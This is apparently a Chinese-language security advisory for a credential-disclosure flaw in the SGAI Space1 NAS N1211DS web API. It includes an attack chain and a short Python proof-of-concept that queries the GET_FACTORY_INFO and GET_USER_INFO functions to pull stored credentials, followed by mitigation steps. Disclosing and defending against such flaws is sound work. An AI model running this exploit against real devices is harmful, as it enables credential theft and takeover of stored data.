CVE-2025-14183 SGAI Space1 NAS N1211DS 凭证泄露漏洞

漏洞信息

漏洞编号

CVE-2025-14183

漏洞类型

凭证泄露/敏感信息暴露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SGAI Space1 NAS N1211DS

漏洞概述

CVE-2025-14183是影响SGAI Space1 NAS N1211DS设备的一个中危安全漏洞，CVSS评分4.3。该漏洞存在于设备的gsaiagent组件中，具体位于/cgi-bin/JSONAPI接口的GET_FACTORY_INFO和GET_USER_INFO函数。由于这些函数对凭证的存储和处理缺乏适当的安全保护机制，导致攻击者可以在无需高权限的情况下远程获取系统中的敏感凭证信息。漏洞影响版本至1.0.915，攻击者可远程利用此漏洞获取设备管理凭据，进而可能完全控制受影响的NAS设备。该漏洞已被公开披露，厂商在收到报告后未作出任何回应。鉴于漏洞影响的是网络存储设备，攻击成功后可能导致大量敏感数据的泄露，风险不容忽视。

技术细节

该漏洞的根本原因在于SGAI Space1 NAS N1211DS设备的Web管理界面中，/cgi-bin/JSONAPI接口的GET_FACTORY_INFO和GET_USER_INFO函数存在不安全的凭证存储问题。攻击者通过构造特定的HTTP GET请求，指定相应的函数名称，即可触发这些接口并获取存储在系统中的凭证信息。由于CVSS向量显示攻击复杂度为低(AC:L)且不需要高权限(L:P)，任何能够访问该设备网络的管理用户或被诱导访问恶意链接的用户都可以发起攻击。获取的凭证可能包括设备管理员账户、用户账户或其他服务账户的认证信息。攻击者获取这些凭证后，可以进一步进行横向移动或完全接管NAS设备，访问存储在设备上的所有数据。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标SGAI Space1 NAS N1211DS设备，获取其IP地址和Web管理界面访问地址

STEP 2

步骤2

构造恶意请求：攻击者构造针对/cgi-bin/JSONAPI接口的HTTP GET请求，设置function参数为GET_FACTORY_INFO或GET_USER_INFO

STEP 3

步骤3

发送漏洞利用请求：通过低权限账户或无需认证的方式，向目标设备发送构造好的请求

STEP 4

步骤4

获取敏感凭证：漏洞接口返回包含凭证信息的响应，攻击者获取到设备的管理员或用户账户凭据

STEP 5

步骤5

权限提升与持久化：利用获取的凭证登录设备管理后台，窃取存储数据或部署后门程序

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14183 PoC - SGAI Space1 NAS Credential Disclosure
# Target: SGAI Space1 NAS N1211DS
# Vulnerability: Unprotected storage of credentials in /cgi-bin/JSONAPI

target_ip = "192.168.1.100"  # Replace with target IP
target_port = 80

def exploit_credential_disclosure():
    """Exploit CVE-2025-14183 to retrieve credentials"""
    
    # Get Factory Info
    factory_url = f"http://{target_ip}:{target_port}/cgi-bin/JSONAPI"
    factory_params = {
        "function": "GET_FACTORY_INFO"
    }
    
    # Get User Info
    user_params = {
        "function": "GET_USER_INFO"
    }
    
    print("[*] Exploiting CVE-2025-14183...")
    print(f"[*] Target: {target_ip}:{target_port}")
    
    try:
        # Request factory information
        print("[*] Requesting factory information...")
        factory_response = requests.get(factory_url, params=factory_params, timeout=10)
        print(f"[+] Factory Info Response: {factory_response.text}")
        
        # Request user information
        print("[*] Requesting user information...")
        user_response = requests.get(factory_url, params=user_params, timeout=10)
        print(f"[+] User Info Response: {user_response.text}")
        
        return factory_response.json(), user_response.json()
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None, None

if __name__ == "__main__":
    exploit_credential_disclosure()

影响范围

SGAI Space1 NAS N1211DS < 1.0.915

防御指南

临时缓解措施

在厂商正式发布安全更新之前，建议采取以下临时缓解措施：1) 通过防火墙规则限制对NAS设备Web管理界面的访问，只允许受信任的IP地址访问；2) 禁用不必要的远程管理功能；3) 监控设备日志，关注异常的GET_FACTORY_INFO和GET_USER_INFO请求；4) 考虑使用VPN或零信任架构来访问内部NAS设备；5) 定期备份NAS中存储的重要数据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14183
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14183
3 Details https://www.cvedetails.com/cve/CVE-2025-14183/
4 VulDB https://vuldb.com/cve/CVE-2025-14183
5 Link https://vuldb.com/?ctiid.334603
6 Link https://vuldb.com/?id.334603
7 Link https://vuldb.com/?submit.698566
8 Link https://vuldb.com/?submit.698567
9 Link https://www.notion.so/2b16cf4e528a8000b30bd543247fa1bd
10 Link https://www.notion.so/2b16cf4e528a80859264db63f2340d7a